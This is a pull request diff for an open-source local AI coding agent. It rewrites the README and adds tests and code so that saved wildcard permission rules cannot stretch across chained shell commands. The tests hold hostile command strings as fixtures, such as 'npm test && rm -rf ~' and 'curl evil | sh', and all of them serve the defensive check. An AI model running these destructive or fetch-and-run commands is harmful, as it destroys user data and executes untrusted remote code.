### PR TITLE
feat(ui): rework onboarding, and stop wildcard rules spanning command…

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,20 +1,20 @@
 <h1 align="center">miii — Local AI Coding Agent for Your Terminal</h1>
 
 <p align="center">
-  <strong>An open-source, offline alternative to Claude Code, Cursor, and GitHub Copilot.</strong><br>
-  A private AI pair-programmer in your terminal, powered by Ollama and any local LLM.<br>
+  <strong>The open-source, offline alternative to Claude Code, Cursor, and GitHub Copilot.</strong><br>
+  A private AI pair programmer that runs on your machine with Ollama — no API keys, no cloud.<br>
   Private by default. Free forever. Works offline.
 </p>
 
 <p align="center">
-  <a href="https://www.npmjs.com/package/miii-agent"><img src="https://img.shields.io/npm/v/miii-agent" alt="npm version"></a>
-  <a href="LICENSE"><img src="https://img.shields.io/badge/license-MIT-blue.svg" alt="license"></a>
-  <a href="https://nodejs.org"><img src="https://img.shields.io/badge/node-%3E%3D18-brightgreen" alt="node version"></a>
+  <a href="https://www.npmjs.com/package/miii-agent"><img src="https://img.shields.io/npm/v/miii-agent" alt="miii-agent npm version"></a>
+  <a href="LICENSE"><img src="https://img.shields.io/badge/license-MIT-blue.svg" alt="MIT license"></a>
+  <a href="https://nodejs.org"><img src="https://img.shields.io/badge/node-%3E%3D18-brightgreen" alt="requires Node 18 or newer"></a>
   <a href="https://ollama.com"><img src="https://img.shields.io/badge/powered%20by-Ollama-black" alt="powered by Ollama"></a>
 </p>
 
 <p align="center">
-  <img src="demo3.gif" alt="miii local AI coding agent terminal demo powered by Ollama">
+  <img src="demo3.gif" alt="miii local AI coding agent running in a terminal, powered by Ollama">
 </p>
 
 <p align="center">
@@ -23,53 +23,17 @@
   ⚡ <strong>Offline</strong> — runs on your own GPU
 </p>
 
----
-
-## What is miii? — a local AI coding agent
-
-miii lives in your terminal and codes alongside you — reading files, writing features, running tests, fixing bugs. The twist: it runs on **your** hardware, powered by [Ollama](https://ollama.com) (or any local OpenAI-compatible server like [llama.cpp](https://github.com/ggml-org/llama.cpp) / [LM Studio](https://lmstudio.ai)).
-
-Your code never leaves your disk. There's nothing to log in to. Pull a model, type `miii`, go. It's the open-source, offline answer to cloud coding assistants like Claude Code, Cursor, and GitHub Copilot.
-
-## Install (macOS, Linux, Windows)
-
-**macOS / Linux:**
+## Install
 
 ```bash
 ollama pull qwen2.5-coder:14b   # any coding model works
 curl -fsSL https://raw.githubusercontent.com/maruakshay/miii-cli/main/install.sh | sh
 miii
 ```
-*(The installer downloads the pre-compiled binary and adds it to your local path)*
 
-**Windows (PowerShell):**
+Windows: `irm https://raw.githubusercontent.com/maruakshay/miii-cli/main/install.ps1 | iex` &nbsp;·&nbsp; any platform: `npm i -g miii-agent` &nbsp;·&nbsp; needs Node ≥ 18 and [Ollama](https://ollama.com/download).
 
-```powershell
-ollama pull qwen2.5-coder:14b
-irm https://raw.githubusercontent.com/maruakshay/miii-cli/main/install.ps1 | iex
-miii
-```
-
-**Which model should I use?**
-- **Low VRAM (8GB):** `qwen2.5-coder:7b` (fast, capable)
-- **Mid VRAM (16–24GB):** `qwen2.5-coder:14b` (sweet spot)
-- **High VRAM (48GB+):** `qwen2.5-coder:32b` (powerhouse)
-
-Smaller models work too — miii repairs the malformed tool calls they tend to
-emit rather than burning a turn on each one. Run `miii doctor` to see how yours
-actually score.
-
-Prefer npm? `npm install -g miii-agent` works on every platform.
-
-> **Install failing on permissions?** Your global npm prefix isn't writable. The
-> installer retries with `sudo` where available; otherwise point npm at a
-> user-owned prefix and re-run:
-> ```bash
-> npm config set prefix "$HOME/.npm-global"
-> export PATH="$HOME/.npm-global/bin:$PATH"   # add to ~/.bashrc or ~/.zshrc
-> ```
-
-Then just talk to it:
+## Then just talk to it
 
 ```
 > refactor the auth module to use async/await
@@ -77,58 +41,30 @@ Then just talk to it:
 > why are my tests failing in utils/parser.ts
 ```
 
-> **Needs:** Node ≥ 18 and [Ollama](https://ollama.com/download) running locally.
+miii reads your files, writes the code, runs your tests, and fixes what breaks — planning before it acts, and verifying after. Entirely on your own GPU.
 
-## Staying up to date
+## Why local-first?
 
-miii checks npm on launch and, when a newer release exists, pulls it in the
-background — it applies the next time you start. Manual options:
-
-```bash
-miii update     # update now
-miii --version  # what you're running
-```
-
-Opt out of background updates by adding `"autoUpdate": false` to `~/.miii/config.json`,
-or re-run the install script (`curl … | sh`) any time to update by hand.
-
-## Why local-first? Private, free, offline
-
-Most "AI coding tools" are just wrappers around a cloud API — slow, metered, and they ship your private codebase to someone else's server.
-
-|              | Cloud agents          | **miii**                     |
-|--------------|-----------------------|------------------------------|
-| Your code    | Sent to a third party | Never leaves your machine    |
-| Cost         | Per-token billing     | Free — runs on your hardware |
-| Setup        | API keys, accounts    | `npm i -g miii-agent`        |
-| Offline      | No                    | Yes                          |
-| Latency      | Network + queue       | Your GPU only                |
-
-It doesn't just chat, either — it follows a **Plan $\rightarrow$ Act $\rightarrow$ Observe** loop:
-1. **Plan**: Decomposes the problem into a sequence of concrete steps.
-2. **Act**: Calls the necessary tools to gather context or modify code.
-3. **Observe**: Verifies the result and adjusts the plan until the goal is met.
-
-## Five letters, five ideas
-
-**s**mall · **s**imple · **s**mart · **s**trategic · **s**emantic — a tiny codebase you can read in an afternoon, no config ceremony, plans before it acts, and operates on the *meaning* of your code, not blind text matching.
+|            | Cloud agents          | **miii**                     |
+|------------|-----------------------|------------------------------|
+| Your code  | Sent to a third party | Never leaves your machine    |
+| Cost       | Per-token billing     | Free — runs on your hardware |
+| Setup      | API keys, accounts    | `npm i -g miii-agent`        |
+| Offline    | No                    | Yes                          |
+| Latency    | Network + queue       | Your GPU only                |
 
 ## Features
 
-- **🧪 `miii doctor`** — not every local model can drive an agent. Doctor runs your models through real engineering tasks and tells you which ones actually deliver.
-  ```bash
-  miii doctor                  # grade every installed model
-  miii doctor qwen2.5-coder:7b # grade one
-  ```
-- **🖼️ Paste images** — copy a screenshot and hit `Ctrl+V` to attach it to your message, or paste an image file path. Great for "why does this UI look broken?" or reading an error screenshot. **Needs a vision-capable model** (`llava`, `llama3.2-vision`, `qwen2-vl`, …) — text-only models silently ignore the image.
-  ```bash
-  ollama pull llava            # or llama3.2-vision
-  ```
-- **💧 Lossless output spill** — that 50K-line test log won't get truncated and leave the model guessing. miii spills the full output to disk and lets the model page through it. Nothing is ever lost.
-- **🔒 Permission-gated tools** — you approve what the agent can touch; "always" approvals persist, and the prompt shows you the exact rule it will save. A saved wildcard never stretches across a command boundary, so approving `npm test` can't quietly authorize `npm test && rm -rf ~`. File tools are confined to your working directory.
-- **📄 `MIII.md`** — drop one in your repo to teach miii your conventions, build/test commands, and do's & don'ts. Same idea as `CLAUDE.md`, read every turn.
+- **🧠 Works with small models** — miii repairs the malformed tool calls a 7B model emits instead of burning a turn on each one, and sizes its own prompt to your context window so the room goes to your code.
+- **🧪 `miii doctor`** — not every local model can drive an agent. Grades your installed models on real engineering tasks.
+- **🖼️ Paste images** — `Ctrl+V` a screenshot to ask why a UI looks broken. Needs a vision model (`llava`, `llama3.2-vision`, …).
+- **💧 Lossless output spill** — a 50K-line test log is never truncated. The full text goes to disk and the model pages through it.
+- **🔒 Permission-gated tools** — you approve what the agent touches, and see the exact rule before you save it. A saved wildcard never stretches across a command boundary, so approving `npm test` can't quietly authorize `npm test && rm -rf ~`.
+- **📄 `MIII.md`** — drop one in your repo to teach miii your conventions and commands. Same idea as `CLAUDE.md`, read every turn.
 
-## Going deeper
+**Picking a model:** 8GB VRAM → `qwen2.5-coder:7b` · 16–24GB → `qwen2.5-coder:14b` (sweet spot) · 48GB+ → `qwen2.5-coder:32b`.
+
+---
 
 <details>
 <summary><strong>Built-in tools</strong></summary>
@@ -144,12 +80,20 @@ It doesn't just chat, either — it follows a **Plan $\rightarrow$ Act $\rightar
 | `write_todos` | Track multi-step work as a live checklist |
 
 File tools (`read_file`, `write_file`, `edit_file`) reject `../` traversal and absolute paths outside the workspace. `run_bash` is **not** path-confined — its only boundary is the permission prompt, so review commands before approving.
-
-Answering "always" saves both the exact command and a generalized glob (`npm run build` → `npm run *`), and the prompt shows you the widest rule before you choose. Two things are never widened: destructive programs (`rm`, `dd`, `sudo`, `git reset`, …) and compound commands, whose first token says nothing about what the rest of the line does. A saved glob also refuses to match any command containing an unquoted `;` `&&` `||` `|` `>` or `$(…)`, so an approval can't be extended past the command you actually read. Saved rules live in `~/.miii/permissions.json`.
 </details>
 
 <details>
-<summary><strong>Keyboard shortcuts</strong></summary>
+<summary><strong>How "always" approvals are scoped</strong></summary>
+
+Answering "always" saves both the exact command and a generalized glob (`npm run build` → `npm run *`), and the prompt shows you the widest rule before you choose.
+
+Two things are never widened: destructive programs (`rm`, `dd`, `sudo`, `git reset`, …) and compound commands, whose first token says nothing about what the rest of the line does. A saved glob also refuses to match any command containing an unquoted `;` `&&` `||` `|` `>` or `$(…)`, so an approval can't be stretched past the command you actually read.
+
+Saved rules live in `~/.miii/permissions.json`.
+</details>
+
+<details>
+<summary><strong>Keyboard shortcuts and commands</strong></summary>
 
 | Key | Action |
 |-----|--------|
@@ -174,7 +118,7 @@ Answering "always" saves both the exact command and a generalized glob (`npm run
 </details>
 
 <details>
-<summary><strong>Configuration & other backends</strong></summary>
+<summary><strong>Configuration, other backends, and updates</strong></summary>
 
 Settings live in `~/.miii/config.json`, created on first run:
 
@@ -188,13 +132,9 @@ Settings live in `~/.miii/config.json`, created on first run:
 }
 ```
 
-`effort` (`low` \| `medium` \| `high`) controls temperature and the output token
-cap. `numCtxCap` (default `16384`) bounds the context window miii asks for, so a
-model advertising a 131k window can't make Ollama size a KV cache that eats your
-RAM — it only ever lowers, never raises. A top-level `ollamaHost` still works and
-is folded into the `ollama` provider on load.
+`effort` (`low` \| `medium` \| `high`) controls temperature and the output token cap. `numCtxCap` (default `16384`) bounds the context window miii asks for, so a model advertising a 131k window can't make Ollama size a KV cache that eats your RAM — it only ever lowers, never raises. A top-level `ollamaHost` still works and is folded into the `ollama` provider on load.
 
-miii talks to any **OpenAI-compatible** local server too. Start `llama-server`, then point a named provider at it:
+miii talks to any **OpenAI-compatible** local server too — [llama.cpp](https://github.com/ggml-org/llama.cpp), [LM Studio](https://lmstudio.ai), vLLM:
 
 ```json
 {
@@ -207,10 +147,18 @@ miii talks to any **OpenAI-compatible** local server too. Start `llama-server`, 
 ```
 
 Switch at launch with `miii --provider llamacpp`. Any `openai`-type provider on `localhost` counts as local — no key, no cloud.
+
+**Updates:** miii checks npm on launch and pulls a newer release in the background, applied on next start. `miii update` to do it now, `miii --version` to check. Opt out with `"autoUpdate": false`.
+
+**Install failing on permissions?** Your global npm prefix isn't writable:
+```bash
+npm config set prefix "$HOME/.npm-global"
+export PATH="$HOME/.npm-global/bin:$PATH"   # add to ~/.bashrc or ~/.zshrc
+```
 </details>
 
 <details>
-<summary><strong>How it spills output</strong></summary>
+<summary><strong>How output spill works</strong></summary>
 
 When a tool result exceeds the inline budget (~10K bytes), the full output is written to `~/.miii/output/<id>.txt`. Only a head + tail preview is inlined, with a pointer:
 
@@ -226,7 +174,6 @@ The model pages through the middle with ranged `read_file` reads. Spill files ar
 <details>
 <summary><strong>Development</strong></summary>
 
-**Project Architecture:**
 ```text
 src/
  ├── agent/       # The core reasoning loop, and tool-call repair
@@ -240,50 +187,39 @@ src/
 ```
 
 ```bash
-git clone https://github.com/maruakshay/miii-cli.git
-cd miii-cli
-npm install
-npm run dev
+git clone https://github.com/maruakshay/miii-cli.git && cd miii-cli
+npm install && npm run dev
 ```
 
 ```bash
 npm run build       # production build
 npm run typecheck   # type-check src + eval
+npm test            # unit tests
 npm run eval        # regression gate (powers `miii doctor`)
 ```
 
-To run your local working tree against the global `miii`:
-
-```bash
-npm run build && npm link   # restore later with: npm install -g miii-agent
-```
+To run your working tree as the global `miii`: `npm run build && npm link` (restore with `npm i -g miii-agent`).
 </details>
 
 ---
 
 ## FAQ
 
-**Does miii work without internet?**
-Yes. Once you've pulled a model with Ollama, miii runs fully offline. No network calls, no account, no cloud.
+**Does miii work without internet?** Yes. Once you've pulled a model with Ollama, miii runs fully offline — no network calls, no account, no cloud.
 
-**Is my code sent anywhere?**
-No. Every file read, edit, and model inference happens on your machine. Your codebase never leaves your disk.
+**Is my code sent anywhere?** No. Every file read, edit, and inference happens on your machine — privacy is the default, not a setting.
 
-**Which model is best for coding?**
-Depends on VRAM: `qwen2.5-coder:7b` (8GB), `qwen2.5-coder:14b` (16–24GB, the sweet spot), `qwen2.5-coder:32b` (48GB+). Run `miii doctor` to grade your installed models on real engineering tasks.
+**How is miii different from Claude Code, Cursor, or GitHub Copilot?** Those are cloud services — metered, account-gated, and they ship your code to a third-party server. miii is open-source, free, and runs entirely on your hardware, with the same terminal-agent workflow.
 
-**How is miii different from Claude Code, Cursor, or GitHub Copilot?**
-Claude Code, Cursor, and Copilot are cloud services — metered, account-gated, and they ship your code to a third-party server. miii is open-source, free, and runs entirely on your hardware. Same terminal-agent workflow as Claude Code, but on your own local model.
+**How is it different from Continue.dev?** Continue.dev is an IDE extension. miii is a standalone terminal agent — no editor required.
 
-**How is it different from Continue.dev?**
-Continue.dev is an IDE extension. miii is a standalone terminal agent — no editor required — with a Plan → Act → Observe loop, permission-gated tools, and lossless output spill built in.
+**Which local LLM is best for coding?** `qwen2.5-coder` at the largest size your VRAM allows. Run `miii doctor` to grade what you have installed.
 
-**Do I need a GPU?**
-No, but it helps. Smaller models run on CPU; a GPU makes larger models fast enough for real work.
+**Do I need a GPU?** No, but it helps. Smaller models run on CPU; a GPU makes larger ones fast enough for real work.
 
 ## Status
 
-**MVP.** Core agent loop is stable; actively refining tool execution, streaming, and the permission model. PRs welcome — fork it, break it, improve it.
+**MVP.** The core agent loop is stable; actively refining tool execution, streaming, and the permission model. PRs welcome.
 
 ## License
 

--- a/README.md
+++ b/README.md
@@ -37,14 +37,6 @@ Your code never leaves your disk. There's nothing to log in to. Pull a model, ty
 
 ```bash
 ollama pull qwen2.5-coder:14b   # any coding model works
-```
-
-**Which model should I use?**
-- **Low VRAM (8GB):** `qwen2.5-coder:7b` (Fast, capable)
-- **Mid VRAM (16-24GB):** `qwen2.5-coder:14b` (Sweet spot)
-- **High VRAM (48GB+):** `qwen2.5-coder:32b` (Powerhouse)
-
-```bash
 curl -fsSL https://raw.githubusercontent.com/maruakshay/miii-cli/main/install.sh | sh
 miii
 ```
@@ -57,6 +49,15 @@ ollama pull qwen2.5-coder:14b
 irm https://raw.githubusercontent.com/maruakshay/miii-cli/main/install.ps1 | iex
 miii
 ```
+
+**Which model should I use?**
+- **Low VRAM (8GB):** `qwen2.5-coder:7b` (fast, capable)
+- **Mid VRAM (16–24GB):** `qwen2.5-coder:14b` (sweet spot)
+- **High VRAM (48GB+):** `qwen2.5-coder:32b` (powerhouse)
+
+Smaller models work too — miii repairs the malformed tool calls they tend to
+emit rather than burning a turn on each one. Run `miii doctor` to see how yours
+actually score.
 
 Prefer npm? `npm install -g miii-agent` works on every platform.
 
@@ -124,7 +125,7 @@ It doesn't just chat, either — it follows a **Plan $\rightarrow$ Act $\rightar
   ollama pull llava            # or llama3.2-vision
   ```
 - **💧 Lossless output spill** — that 50K-line test log won't get truncated and leave the model guessing. miii spills the full output to disk and lets the model page through it. Nothing is ever lost.
-- **🔒 Permission-gated tools** — you approve what the agent can touch; "always" approvals persist. File tools are confined to your working directory.
+- **🔒 Permission-gated tools** — you approve what the agent can touch; "always" approvals persist, and the prompt shows you the exact rule it will save. A saved wildcard never stretches across a command boundary, so approving `npm test` can't quietly authorize `npm test && rm -rf ~`. File tools are confined to your working directory.
 - **📄 `MIII.md`** — drop one in your repo to teach miii your conventions, build/test commands, and do's & don'ts. Same idea as `CLAUDE.md`, read every turn.
 
 ## Going deeper
@@ -140,8 +141,11 @@ It doesn't just chat, either — it follows a **Plan $\rightarrow$ Act $\rightar
 | `glob` | Pattern-match files across the project |
 | `grep` | Regex search across files |
 | `run_bash` | Execute shell commands |
+| `write_todos` | Track multi-step work as a live checklist |
 
-File tools (`read_file`, `write_file`, `edit_file`) reject `../` traversal and absolute paths outside the workspace. `run_bash` is **not** path-confined — its only boundary is the permission prompt, so review commands before approving (especially "always"). Saved rules live in `~/.miii/permissions.json`.
+File tools (`read_file`, `write_file`, `edit_file`) reject `../` traversal and absolute paths outside the workspace. `run_bash` is **not** path-confined — its only boundary is the permission prompt, so review commands before approving.
+
+Answering "always" saves both the exact command and a generalized glob (`npm run build` → `npm run *`), and the prompt shows you the widest rule before you choose. Two things are never widened: destructive programs (`rm`, `dd`, `sudo`, `git reset`, …) and compound commands, whose first token says nothing about what the rest of the line does. A saved glob also refuses to match any command containing an unquoted `;` `&&` `||` `|` `>` or `$(…)`, so an approval can't be extended past the command you actually read. Saved rules live in `~/.miii/permissions.json`.
 </details>
 
 <details>
@@ -150,13 +154,23 @@ File tools (`read_file`, `write_file`, `edit_file`) reject `../` traversal and a
 | Key | Action |
 |-----|--------|
 | `Enter` | Send prompt |
+| `/` | Open the command palette |
 | `@filename` | Attach file to context |
 | `Ctrl+V` | Paste clipboard image (needs a vision model) |
-| `/models` | Switch active model |
-| `/clear` | Reset conversation |
-| `Esc` | Stop generation or tool run |
+| `Ctrl+T` | Toggle the model's thinking |
 | `Ctrl+O` | Toggle full tool output |
+| `Ctrl+A` / `Ctrl+E` | Jump to start / end of line |
+| `Esc` | Stop generation or tool run |
 | `Ctrl+C` | Quit |
+
+| Command | Action |
+|---------|--------|
+| `/models` | Switch model, provider (`tab`) and effort (`←→`) |
+| `/provider` | Pick a configured provider |
+| `/new` | Save this session and start fresh |
+| `/sessions` | List and resume a saved session |
+| `/clear` | Reset conversation |
+| `/exit` | Quit |
 </details>
 
 <details>
@@ -167,12 +181,18 @@ Settings live in `~/.miii/config.json`, created on first run:
 ```json
 {
   "model": "qwen2.5-coder:14b",
-  "ollamaHost": "http://localhost:11434",
-  "effort": "medium"
+  "effort": "medium",
+  "providers": {
+    "ollama": { "type": "ollama", "baseUrl": "http://localhost:11434" }
+  }
 }
 ```
 
-`effort` (`low` \| `medium` \| `high`) controls temperature and limits.
+`effort` (`low` \| `medium` \| `high`) controls temperature and the output token
+cap. `numCtxCap` (default `16384`) bounds the context window miii asks for, so a
+model advertising a 131k window can't make Ollama size a KV cache that eats your
+RAM — it only ever lowers, never raises. A top-level `ollamaHost` still works and
+is folded into the `ollama` provider on load.
 
 miii talks to any **OpenAI-compatible** local server too. Start `llama-server`, then point a named provider at it:
 
@@ -195,9 +215,9 @@ Switch at launch with `miii --provider llamacpp`. Any `openai`-type provider on 
 When a tool result exceeds the inline budget (~10K bytes), the full output is written to `~/.miii/output/<id>.txt`. Only a head + tail preview is inlined, with a pointer:
 
 ```
-[command output truncated: 5184 lines / 412900 bytes.
- Full output at ~/.miii/output/9f3a1c.txt — read it with
- read_file offset/limit to see the elided middle.]
+[This command output was long (412900 bytes), so I'm showing the start and
+ end. The full text is saved at ~/.miii/output/9f3a1c.txt — read it with
+ read_file offset/limit to see the middle.]
 ```
 
 The model pages through the middle with ranged `read_file` reads. Spill files are garbage-collected after 24 hours.
@@ -209,10 +229,14 @@ The model pages through the middle with ranged `read_file` reads. Spill files ar
 **Project Architecture:**
 ```text
 src/
- ├── agent/    # The core reasoning loop
- ├── tools/    # Implementation of read/write/bash
- ├── terminal/ # UI and input handling
- └── config/   # Settings and provider logic
+ ├── agent/       # The core reasoning loop, and tool-call repair
+ ├── tools/       # read/write/edit/bash/grep/glob/todos + output spill
+ ├── prompt/      # System prompt and MIII.md project context
+ ├── permissions/ # Approval rules and how they're scoped
+ ├── llm/         # Ollama and OpenAI-compatible backends
+ ├── session/     # Saved conversations
+ ├── ui/          # Ink terminal UI and input handling
+ └── config.ts    # Settings and provider resolution
 ```
 
 ```bash

--- a/src/permissions/policy.test.ts
+++ b/src/permissions/policy.test.ts
@@ -1,5 +1,20 @@
 import { describe, it, expect } from 'vitest'
-import { globToRegExp, subjectFor, generalizeCommand, patternToPersist } from './policy.js'
+import {
+  globToRegExp,
+  subjectFor,
+  generalizeCommand,
+  patternsToPersist,
+  widestPattern,
+  hasUnquotedShellOperator,
+  ruleAllows,
+} from './policy.js'
+
+/** Approve `command` with "always", then ask whether `next` runs unprompted. */
+function autoAllowsAfterApproving(command: string, next: string): boolean {
+  return patternsToPersist('run_bash', command).some((pattern) =>
+    ruleAllows({ tool: 'run_bash', pattern }, 'run_bash', next),
+  )
+}
 
 describe('globToRegExp', () => {
   it('matches an exact literal', () => {
@@ -9,7 +24,10 @@ describe('globToRegExp', () => {
 
   it('treats * as a wildcard run', () => {
     expect(globToRegExp('npm test *').test('npm test src/a')).toBe(true)
-    expect(globToRegExp('npm test *').test('npm test')).toBe(false) // needs a space + something
+    // Needs a space + something. This is why patternsToPersist stores the exact
+    // command alongside the glob — otherwise "always" on "npm test" re-prompts
+    // on the very next "npm test".
+    expect(globToRegExp('npm test *').test('npm test')).toBe(false)
   })
 
   it('treats ? as a single char', () => {
@@ -28,10 +46,10 @@ describe('globToRegExp', () => {
     expect(globToRegExp('ls').test('please ls')).toBe(false)
   })
 
-  it('documents the footgun: * spans shell separators', () => {
-    // A hand-added "npm test *" rule also matches a chained destructive command,
-    // because * compiles to .* with no separator awareness. Captured so a future
-    // change to tighten this breaks the test deliberately.
+  // globToRegExp is the raw glob compiler: * really is .* and spans anything.
+  // Command-boundary awareness lives one layer up, in matches() — see the
+  // "wildcard rules never span a command boundary" tests below.
+  it('compiles * to an unrestricted run', () => {
     expect(globToRegExp('npm test *').test('npm test x; rm -rf /')).toBe(true)
   })
 })
@@ -100,17 +118,38 @@ describe('generalizeCommand', () => {
   })
 })
 
-describe('patternToPersist', () => {
-  it('generalizes run_bash commands', () => {
-    expect(patternToPersist('run_bash', "git commit -m 'x'")).toBe('git commit *')
+describe('patternsToPersist', () => {
+  it('persists the exact command alongside its generalization', () => {
+    expect(patternsToPersist('run_bash', "git commit -m 'x'")).toEqual([
+      "git commit -m 'x'",
+      'git commit *',
+    ])
   })
 
-  it('keeps destructive commands exact', () => {
-    expect(patternToPersist('run_bash', 'rm -rf node_modules')).toBe('rm -rf node_modules')
+  // The regression that made "always" a no-op: "npm test" generalizes to
+  // "npm test *", which does not match "npm test" itself.
+  it('an approved command matches one of its own persisted rules', () => {
+    const rules = patternsToPersist('run_bash', 'npm test')
+    expect(rules.some((r) => globToRegExp(r).test('npm test'))).toBe(true)
+  })
+
+  it('keeps destructive commands exact, with no glob alongside', () => {
+    expect(patternsToPersist('run_bash', 'rm -rf node_modules')).toEqual(['rm -rf node_modules'])
   })
 
   it('leaves path subjects untouched', () => {
-    expect(patternToPersist('write_file', 'src/a.ts')).toBe('src/a.ts')
+    expect(patternsToPersist('write_file', 'src/a.ts')).toEqual(['src/a.ts'])
+  })
+})
+
+describe('widestPattern', () => {
+  it('reports the glob, not the exact command — that is the blast radius', () => {
+    expect(widestPattern('run_bash', 'npm run build')).toBe('npm run *')
+  })
+
+  it('reports the exact command when nothing is generalized', () => {
+    expect(widestPattern('run_bash', 'rm -rf build')).toBe('rm -rf build')
+    expect(widestPattern('write_file', 'src/a.ts')).toBe('src/a.ts')
   })
 })
 
@@ -127,5 +166,80 @@ describe('subjectFor', () => {
     expect(subjectFor('run_bash', {})).toBe('')
     expect(subjectFor('write_file', {})).toBe('')
     expect(subjectFor('run_bash', null)).toBe('')
+  })
+})
+
+describe('hasUnquotedShellOperator', () => {
+  it('finds operators that chain or redirect', () => {
+    expect(hasUnquotedShellOperator('npm test && rm -rf ~')).toBe(true)
+    expect(hasUnquotedShellOperator('npm test; ls')).toBe(true)
+    expect(hasUnquotedShellOperator('cat a | sh')).toBe(true)
+    expect(hasUnquotedShellOperator('echo hi > ~/.zshrc')).toBe(true)
+    expect(hasUnquotedShellOperator('npm test &')).toBe(true)
+    expect(hasUnquotedShellOperator('echo $(whoami)')).toBe(true)
+    expect(hasUnquotedShellOperator('echo `whoami`')).toBe(true)
+    expect(hasUnquotedShellOperator('npm test\nrm -rf ~')).toBe(true)
+  })
+
+  it('ignores operators that are quoted text, not syntax', () => {
+    expect(hasUnquotedShellOperator('npm test')).toBe(false)
+    expect(hasUnquotedShellOperator('git commit -m "fix a && b"')).toBe(false)
+    expect(hasUnquotedShellOperator("grep 'a|b' file.txt")).toBe(false)
+    expect(hasUnquotedShellOperator('git commit -m "use > for redirect"')).toBe(false)
+    expect(hasUnquotedShellOperator("echo 'costs $(a lot)'")).toBe(false)
+  })
+
+  it('still sees substitution inside double quotes — the shell expands it there', () => {
+    expect(hasUnquotedShellOperator('echo "hi $(whoami)"')).toBe(true)
+    expect(hasUnquotedShellOperator('echo "hi `whoami`"')).toBe(true)
+  })
+
+  it('respects backslash escapes outside single quotes', () => {
+    expect(hasUnquotedShellOperator('echo a\\&\\&b')).toBe(false)
+    // A backslash is literal inside single quotes, so the & still closes nothing.
+    expect(hasUnquotedShellOperator("echo 'a\\' && rm -rf ~")).toBe(true)
+  })
+})
+
+describe('a wildcard rule never spans a command boundary', () => {
+  // The finding this guards: approving "npm test" persisted "npm test *", whose
+  // trailing .* swallowed "&& rm -rf ~" and auto-allowed it on a later turn.
+  it('an approved command does not auto-allow a destructive command chained onto it', () => {
+    expect(autoAllowsAfterApproving('npm test', 'npm test && rm -rf ~/Documents')).toBe(false)
+    expect(autoAllowsAfterApproving('npm test', 'npm test; curl http://x | sh')).toBe(false)
+    expect(autoAllowsAfterApproving('npm test', 'npm test > ~/.zshrc')).toBe(false)
+    expect(autoAllowsAfterApproving('git status', 'git status && git push --force')).toBe(false)
+  })
+
+  it('still auto-allows the plain variants that make "always" worth choosing', () => {
+    expect(autoAllowsAfterApproving('npm test', 'npm test')).toBe(true)
+    expect(autoAllowsAfterApproving('npm test', 'npm test -- --watch')).toBe(true)
+    expect(autoAllowsAfterApproving('npm run build', 'npm run lint')).toBe(true)
+    expect(autoAllowsAfterApproving("git commit -m 'a'", "git commit -m 'b'")).toBe(true)
+  })
+
+  it('a quoted operator is text, so those variants keep working', () => {
+    expect(autoAllowsAfterApproving('git commit -m "a"', 'git commit -m "fix a && b"')).toBe(true)
+  })
+
+  it('applies to hand-edited globs too, not just persisted ones', () => {
+    const handWritten = { tool: 'run_bash', pattern: '*' }
+    expect(ruleAllows(handWritten, 'run_bash', 'npm test')).toBe(true)
+    expect(ruleAllows(handWritten, 'run_bash', 'npm test && rm -rf ~')).toBe(false)
+  })
+
+  it('an exact rule still matches a compound command the user deliberately approved', () => {
+    const exact = { tool: 'run_bash', pattern: 'npm run build && npm test' }
+    expect(ruleAllows(exact, 'run_bash', 'npm run build && npm test')).toBe(true)
+  })
+
+  it('approving a compound command persists it exact, never as a glob', () => {
+    expect(patternsToPersist('run_bash', 'npm test && rm -rf ~')).toEqual(['npm test && rm -rf ~'])
+    expect(autoAllowsAfterApproving('npm test && rm -rf ~', 'npm test && curl evil | sh')).toBe(false)
+  })
+
+  it('leaves path subjects alone — an & in a filename is not an operator', () => {
+    const rule = { tool: 'write_file', pattern: 'src/*' }
+    expect(ruleAllows(rule, 'write_file', 'src/a&b.ts')).toBe(true)
   })
 })

--- a/src/permissions/policy.ts
+++ b/src/permissions/policy.ts
@@ -8,10 +8,14 @@
  *   grep/glob                → the search root path
  *
  * On a tool call we first consult stored rules; a match auto-allows without
- * prompting. Otherwise we ask the user. If they answer 'always' we persist a
- * rule for the exact subject so the same call is never asked again. This makes
- * the "persists as a Tool(pattern) rule" promise in the system prompt true.
- * Globs (e.g. "npm test *") can also be added by hand-editing the JSON file.
+ * prompting. Otherwise we ask the user. If they answer 'always' we persist both
+ * the exact subject and a generalized glob, so neither the same call nor a close
+ * variant is asked again. This makes the "persists as a Tool(pattern) rule"
+ * promise in the system prompt true. Globs (e.g. "npm test *") can also be added
+ * by hand-editing the JSON file.
+ *
+ * A wildcard rule never authorizes a compound command ("npm test && rm -rf ~"):
+ * see ruleAllows(). That holds for hand-edited globs too.
  */
 import { readFileSync, writeFileSync, mkdirSync, existsSync, renameSync } from 'fs'
 import { join } from 'path'
@@ -54,10 +58,19 @@ function saveRules(rules: Rule[]): void {
 }
 
 export function addRule(tool: string, pattern: string): void {
+  addRules(tool, [pattern])
+}
+
+/** Persist several patterns for one tool in a single load/save cycle. */
+export function addRules(tool: string, patterns: string[]): void {
   const rules = loadRules()
-  if (rules.some((r) => r.tool === tool && r.pattern === pattern)) return
-  rules.push({ tool, pattern })
-  saveRules(rules)
+  let changed = false
+  for (const pattern of patterns) {
+    if (rules.some((r) => r.tool === tool && r.pattern === pattern)) continue
+    rules.push({ tool, pattern })
+    changed = true
+  }
+  if (changed) saveRules(rules)
 }
 
 /** Extract the string a rule pattern matches against for a given tool call. */
@@ -132,11 +145,52 @@ const DESTRUCTIVE_GIT_SUBCOMMANDS = new Set([
 ])
 
 /**
+ * Does `command` contain a shell control operator OUTSIDE quotes — something
+ * that chains another command (`;` `&` `&&` `||` `|`, a newline), substitutes
+ * one (`` ` `` , `$(`), or redirects a stream (`>` `<`)?
+ *
+ * Quoting is respected so the everyday false positives don't fire: the `&&` in
+ * `git commit -m "fix a && b"` and the `|` in `grep "a|b" file` are literal
+ * text, not operators. Inside double quotes only command substitution still
+ * counts, since the shell keeps expanding it there.
+ *
+ * Used to keep a wildcard rule from spanning a command boundary — see ruleAllows().
+ */
+export function hasUnquotedShellOperator(command: string): boolean {
+  let quote: "'" | '"' | null = null
+  for (let i = 0; i < command.length; i++) {
+    const ch = command[i]
+    // A backslash escapes the next char everywhere except inside single quotes.
+    if (ch === '\\' && quote !== "'") {
+      i++
+      continue
+    }
+    if (quote) {
+      if (ch === quote) quote = null
+      // Single quotes are fully literal; double quotes still expand $() and ``.
